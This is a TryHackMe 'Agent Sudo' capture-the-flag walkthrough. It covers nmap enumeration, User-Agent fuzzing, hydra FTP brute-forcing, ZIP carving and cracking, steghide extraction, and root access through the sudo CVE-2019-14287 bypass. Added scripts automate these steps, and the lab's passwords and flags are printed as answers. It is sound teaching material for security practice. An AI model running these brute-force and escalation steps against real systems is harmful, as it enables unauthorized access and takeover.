Tryhackme - Agent Sudo


In this walkthrough we go through the Agent Sudo room from Tryhackme. The room covers basic enumeration, getting initial access with some brute-forcing, and then elevating privileges by abusing a vulnerable sudo binary. Overall it is a fun beginner-level room that covers various basic topics and tests your methodology. So, without further delay, let's get started.


Machine Info:

Title: Agent Sudo
IP address: 10.10.203.67
Difficulty: Easy
Objective: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Task 1 – Author note


Task 2 – Enumerate

Enumerate the machine and get all the important information.

  • Checking whether the machine is up by pinging it.

Question 1 – How many open ports?

  • Scanning the machine with nmap (-sS for a SYN scan, -sV for service version detection).
sudo nmap -sS -sV 10.10.203.67

3 (FTP on 21, SSH on 22 and HTTP on 80, the three services used in the rest of the room)

Question 2 – How you redirect yourself to a secret page?

  • Browsing to the website on port 80. The landing page tells agents to use their codename as the User-Agent, so the redirect to the secret page is controlled by that request header.

user-agent

Question 3 – What is the agent name?

  • Using a user-agent switcher extension, set the User-Agent value to "C" and reload the page. The server redirects to a page addressed to agent C, which gives away the agent's name.

chris
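As an added example (my own code, not part of the original walkthrough), the same User-Agent probing can be done from the command line with curl instead of a browser extension: the script tries every single letter as the User-Agent, does not follow redirects, and prints the letters that come back with a Location header. The target URL is taken from the first argument; the helper names are mine.

```sh
#!/bin/sh
# Added example: fuzz the User-Agent header with single letters and report
# which values make the server redirect. Not the walkthrough's own code.
# Assumption: the target URL (e.g. http://10.10.203.67/) is argument 1.

# First-line status code of a raw HTTP response, e.g. "302".
status_of() {
  printf '%s\n' "$1" | head -n 1 | tr -d '\r' | awk '{print $2}'
}

# Value of the Location header, empty if the response has none.
location_of() {
  printf '%s\n' "$1" | tr -d '\r' | awk 'tolower($1) == "location:" {print $2; exit}'
}

# Fetch only the response headers for one User-Agent value; -D - dumps the
# headers to stdout and, without -L, curl does not follow the redirect.
probe_ua() {
  curl -s -D - -o /dev/null -A "$2" --max-time 5 "$1"
}

# Try A..Z as the User-Agent and print every value that redirects.
fuzz_user_agents() {
  for ua in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
    hdrs=$(probe_ua "$1" "$ua") || continue
    loc=$(location_of "$hdrs")
    [ -n "$loc" ] && printf 'User-Agent %s -> %s %s\n' "$ua" "$(status_of "$hdrs")" "$loc"
  done
}

if [ -n "$1" ]; then
  fuzz_user_agents "$1"
else
  echo "usage: $0 http://TARGET/" >&2
fi
```

Run it as `sh ua_fuzz.sh http://10.10.203.67/`; the letter that prints a redirect is the codename to follow up on, and the Location value is the secret page.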


Task 3 – Hash cracking and brute-force

Done enumerate the machine? Time to brute your way out.

Question 1 – FTP password

  • Running hydra against FTP with the username chris and the rockyou.txt wordlist:
hydra -l chris -P ~/Desktop/Wordlist/rockyou.txt ftp://10.10.203.67

crystal

Question 2 – Zip file password

  • Logging into the FTP server as chris with the cracked password and downloading all three files (cutie.png, cute-alien.jpg and To_agentJ.txt).

  • Reading the contents of To_agentJ.txt:

cat To_agentJ.txt

  • Tried exiftool and steghide on both images; nothing useful came out.

  • Using binwalk to look for files hidden inside the images. Binwalk is a fast and easy-to-use tool for analyzing, reverse engineering, and extracting firmware images; here it scans the image for embedded file signatures, and -e carves out whatever it finds.
binwalk cutie.png
binwalk -e cutie.png

binwalk finds a ZIP archive appended to cutie.png and extracts it (8702.zip).
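Added example, not the walkthrough's own code: the carve that binwalk -e performs, done by hand in POSIX sh, to show why a ZIP can sit inside a perfectly valid PNG. A PNG ends at its IEND chunk and viewers ignore anything after it; a ZIP archive starts with the local-file-header signature PK\003\004, so scanning for that signature and copying from its offset recovers the archive. Function names are mine, and the input used to exercise it is constructed.

```sh
#!/bin/sh
# Added example: find and carve a ZIP archive appended to a PNG without
# binwalk. Not the walkthrough's own code.

# Dump a file as one space-separated line of lowercase hex bytes.
hex_bytes() {
  od -An -v -tx1 "$1" | tr -s ' \n' ' '
}

# Byte offset just past the PNG IEND chunk type ("IEND") and its 4-byte CRC,
# i.e. where trailing data would start. Prints nothing if no IEND is present.
png_trailer_offset() {
  hex_bytes "$1" | awk '{
    n = split($0, b, " ")
    for (i = 1; i <= n - 3; i++)
      if (b[i] == "49" && b[i+1] == "45" && b[i+2] == "4e" && b[i+3] == "44") {
        print i - 1 + 8; exit
      }
  }'
}

# Offsets of every ZIP local-file-header signature (50 4b 03 04) in the file.
zip_offsets() {
  hex_bytes "$1" | awk '{
    n = split($0, b, " ")
    for (i = 1; i <= n - 3; i++)
      if (b[i] == "50" && b[i+1] == "4b" && b[i+2] == "03" && b[i+3] == "04")
        print i - 1
  }'
}

# Copy everything from a 0-based byte offset into a new file (tail -c is 1-based).
carve_from() {
  tail -c +$(($2 + 1)) "$1" > "$3"
}

# Usage: carve_zip image.png out.zip
# Warns if the signature lies before the end of the PNG data, which usually
# means a false positive inside compressed image data rather than an appended file.
carve_zip() {
  off=$(zip_offsets "$1" | head -n 1)
  [ -n "$off" ] || { echo "no ZIP signature in $1" >&2; return 1; }
  trailer=$(png_trailer_offset "$1")
  if [ -n "$trailer" ] && [ "$off" -lt "$trailer" ]; then
    echo "warning: signature at $off is inside the PNG data (trailing data starts at $trailer)" >&2
  fi
  carve_from "$1" "$off" "$2"
  echo "carved ZIP from offset $off into $2"
}
```

After `carve_zip cutie.png carved.zip`, `unzip -l carved.zip` should list the same file binwalk extracted; if the offsets differ from binwalk's, check the warning, as a stray PK\003\004 inside IDAT data will not unpack.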

  • Converting the zip archive into a John-compatible hash with zip2john and cracking it with John the Ripper's default cracking modes.

zip2john 8702.zip > hash.txt

john hash.txt

alien

Question 3 – steg password

  • Extracting the zip archive with the password cracked above. It contains a text file holding a base64 string.

  • Decoding the base64 string in CyberChef gives the steg password.

Area51

Question 4 – Who is the other agent (in full name)?

  • Extracting the steghide payload from the other image with the decoded password (enter Area51 at the passphrase prompt):

steghide extract -sf cute-alien.jpg

cat message.txt

james

Question 5 – SSH password

The same message.txt also contains james's SSH password.

hackerrules!


Task 4 – Capture the user flag

You know the drill.

Question 1 – What is the user flag?

  • Logging in over SSH as james with that password and reading the user flag.

b03d975e8c92a7c04146cfa7a5a313c7

Question 2 – What is the incident of the photo called?

  • Searching Google for "Alien autopsy incident foxnews" (the alien picture from the FTP server is the photo in question).

Roswell alien autopsy


Task 5 – Privilege escalation

Enough with the extraordinary stuff? Time to get real.

  • Serving the linpeas script from the attacking machine, fetching it on the target and running it. The output flags the installed sudo as a vulnerable version.

Question 1 – CVE number for the escalation

  • Searching for the sudo version linpeas reported (1.8.21) turns up the matching privilege-escalation bug: sudo before 1.8.28 lets a user who is allowed to run a command as any user except root bypass that restriction by asking for user ID -1.

CVE-2019-14287

Question 2 – What is the root flag?

  • Checking what james is allowed to run with sudo:

sudo -l

The rule lets james run /bin/bash as any user except root. A numeric target of -1 passes sudo's "not root" check because it is not uid 0, but setresuid() treats -1 as "leave unchanged", so the shell keeps sudo's own uid 0:

sudo -u#-1 /bin/bash

  • Reading the root flag from the resulting root shell.

b53a02f55b57d4439e3341834d70c062
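Added example (my own, not from the walkthrough): a small sh script that checks the two conditions CVE-2019-14287 needs before reaching for the bypass, namely a sudo older than 1.8.28 (the first release with the fix) and a sudoers rule that grants a command as any user except root. It assumes `sudo -V` prints "Sudo version X.Y.Z..." on its first line and that the rule appears in `sudo -l` output as "(ALL, !root) <command>"; the sample rule text in the comment is constructed.

```sh
#!/bin/sh
# Added example: pre-flight checks for CVE-2019-14287. Not the walkthrough's
# own code. Sudo before 1.8.28 passed a user-supplied uid of -1 (or its
# unsigned form 4294967295) through to setresuid(), which treats -1 as "no
# change", so a user restricted to "any user except root" still lands on root.

# Pull "a.b.c" out of a "Sudo version a.b.cpN" line; true if older than 1.8.28.
sudo_version_vulnerable() {
  v=$(printf '%s\n' "$1" | sed -n 's/.*[Vv]ersion \([0-9][0-9.]*\).*/\1/p' | head -n 1)
  [ -n "$v" ] || return 2
  major=$(printf '%s\n' "$v" | cut -d. -f1)
  minor=$(printf '%s\n' "$v" | cut -d. -f2)
  patch=$(printf '%s\n' "$v" | cut -d. -f3)
  [ "$(( ${major:-0} * 10000 + ${minor:-0} * 100 + ${patch:-0} ))" -lt 10828 ]
}

# True if `sudo -l` output contains an "(ALL, !root)" rule; prints the
# command(s) that rule covers, e.g. "/bin/bash" for a constructed line
# "    (ALL, !root) /bin/bash".
sudoers_allows_uid_bypass() {
  printf '%s\n' "$1" | sed -n 's/^[[:space:]]*(ALL,[[:space:]]*!root)[[:space:]]*//p' | grep .
}

# Run both checks on the live system and, if they hold, spawn the root shell.
check_and_exploit() {
  ver=$(sudo -V 2>/dev/null | head -n 1)
  rules=$(sudo -l 2>/dev/null)        # may prompt for the user's password
  if sudo_version_vulnerable "$ver" && cmd=$(sudoers_allows_uid_bypass "$rules"); then
    echo "vulnerable: $ver; rule allows: $cmd"
    sudo -u#-1 /bin/bash
  else
    echo "CVE-2019-14287 conditions not met"
  fi
}

if [ "${1:-}" = "--run" ]; then
  check_and_exploit
fi
```

Invoke it as `sh sudo_check.sh --run` on the target. The version test alone is not enough: without a rule of the "(ALL, !root)" shape there is nothing for the -1 trick to bypass, which is why `sudo -l` is checked as well.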

Question 3 – (Bonus) Who is Agent R?

Deskel



Conclusion:


So that was it. We started the room with basic enumeration using nmap. Next, a user-agent switcher gave us a potential username to proceed with. We then brute-forced the FTP password of user "chris" and downloaded the three files: two pictures and one text file. With binwalk we extracted the zip archive hidden in one picture, converted it with zip2john and cracked its password with John. The archive contained a base64 string, and decoding it gave the steg password for the challenge. With that password we extracted the message hidden in the other picture, which held the second username and the SSH password. For initial access we logged in over SSH with those credentials and got the first flag. For privilege escalation we ran linpeas to find a potential vector, which turned out to be a vulnerable sudo version, and leveraging that we got root.
